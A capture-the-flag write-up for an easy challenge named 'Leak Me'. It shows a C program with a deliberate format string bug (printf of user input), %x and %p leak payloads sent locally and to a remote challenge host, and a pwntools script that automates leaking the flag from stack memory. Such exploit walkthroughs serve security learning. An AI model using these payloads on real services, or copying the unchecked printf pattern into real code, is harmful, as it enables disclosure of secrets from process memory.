# Leak Me

Leam me is an easy challenge with respect to the format string vulnerability. 

## Challenge description

```markdown
Which format tag is your favourite?
```

## Original code

```c
#include <stdlib.h>
#include <stdio.h>

int main() {
    setvbuf(stdout, NULL, _IONBF, 0);
    setvbuf(stdin, NULL, _IONBF, 0);

    char flag[64], buffer[64];

    FILE *f = fopen("./flag.txt", "rt");
    if (f == NULL) {
        puts("No flag.txt found, contact an admin");
        return 1;
    }

    fgets(flag, 64, f);      
    fclose(f);

    printf("What is your favorite format tag? ");
    fgets(buffer, sizeof(buffer), stdin);
    printf(buffer);

    return 0;
}

```

## Solution

Since the printf statment doesnt have any format specifier in it due to which it is a good place to search for the format string vulnerability.

From the below task we can clearly see that the entering the random format string gave me the hex memory address

```bash
➜  leak_me ./task
What is your favorite format tag? %x
8b435963
```

I will Enter the random AAAA characters to know where our offset starts. From the below we see that the offset starts from 16th number so since the flag is read before the this we can find the flag in the below one

```bash
➜  leak_me ./task
What is your favorite format tag? AAAA %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x
AAAA 4d222963 fbad208b e8ecbd00 1 0 80000 a6b642a0 6f696469 0 c00000 40 40 8000 0 0 41414141 25207825
```

Once we send AAAA we can get the values of the hex and if we convert in to the bytes value we can get the flag. This time we are entering %p so that we can find the pointer values

```
➜  leak_me nc rivit.dev 10003
What is your favorite format tag? AAAA %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p 
AAAA 0x748800978b23 0xfbad208b 0x7488008727e2 (nil) (nil) (nil) 0x5a64058e12a0 0x6e7261656c465443 0x5f336b316c5f317b 0x745f74346d723066 0x7d3030745f356734 0xa 0x1 0x5a6404f23040 0x7488009a883c 0x2070252041414141 0x7025207025207025 
```

We can convert the above values from hex to bytes in little endian format we are getting the flag.


```python
>>> hex = "6e7261656c465443"
>>> real = bytes.fromhex(hex)
>>> print(real.decode()[::-1])
CTFlearn
>>> 
```


## autopwn.py

```python
from pwn import *
warnings.filterwarnings("ignore", category=BytesWarning)

p = remote("rivit.dev", 10003)

# print(p.recv().decode())
p.recvuntil("What is your favorite format tag?")
p.sendline(b"AAAA %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p")
response = p.recvline_contains(b"AAAA").decode()
response = response.split(" ")


final = ""

for i in response:
    i=i.removeprefix("0x")
    # print(i)
    if(i=="(nil)" or i=="a" or i==1 or i=="AAAA"):
        continue
    else:
        try:
            bytes_result = bytes.fromhex(i)
            decoded_result = bytes_result[::-1].decode('utf-8')  # Decode ignoring errors
            final += decoded_result
        except ValueError:
            continue

if 'AAAA' in final:
    final = final.split('AAAA')[0]
print(final)
p.close()
```

